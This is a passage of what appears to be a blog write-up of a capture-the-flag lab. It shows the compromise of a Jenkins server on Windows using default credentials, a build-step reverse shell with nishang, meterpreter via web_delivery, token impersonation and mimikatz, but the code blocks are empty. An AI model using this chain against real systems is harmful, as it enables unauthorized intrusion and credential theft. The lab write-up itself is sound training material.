Exploited Jenkins gained an initial shell, then escalated privileges by exploiting Windows authentication tokens. Deployment of meterpreter with web_delivery.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.
Recon
Target: 10.10.230.14
Nmap scan:
1 |
|
Nmap all ports:
1 |
|
Open Port Review:
Port 80 - Microsft IIS httpd 7.5 - webserver
image bruce.jpg and email exposed [email protected]
.
Port 3389 - Remote RDP
Port 8080 - Jetty 9.4.z-SNAPSHOT - webserver
login attempt with admin:admin
enable access to backend.
version number exposed as Jenkins ver. 2.190.1
Jenkins searchsploit:
accessing console
discovered console:
1 |
|
Under “Build” section of the /job/project/configure
the “whoami” offers an ability execute commands on the target system.
Reverse Shell
using nishang PowerShellTcp.ps1
to create a reverse shell:
Github Link: https://github.com/samratashok/nishang.git
creating webserver on local machine via python3
1 |
|
adding powershell command to console “Build” section:
1 |
|
Listener setup: rlwrap allows for (up, down, left, right keyboard commands)
1 |
|
Connection received:
Systeminfo
User.txt
located: C:\Users\bruce\desktop\user.txt
Upgrading shell to meterpreter shell
create payload with msfvenom
1 |
|
Setup multi/handler
Download revshell to target
1 |
|
Start process with:
1 |
|
(in my case meterpreter would hang and never fully connect to handler. Moved to creating meterpreter session with web_delivery)
Creating Meterpreter shell via web_delivery
took the generated code and executed on target:
Migrate to higher process
1 |
|
elevated:
Windows User Impersonation
investigate privleages of bruce:
1 |
|
from this we are able exploit as they are enabled:
1 |
|
Load Incognito + List tokens within meterpreter
1 |
|
Impersonate token
1 |
|
root.txt
located at C:\Windows\System32\config
Post Exploitation
mimikatz extract
1 |
|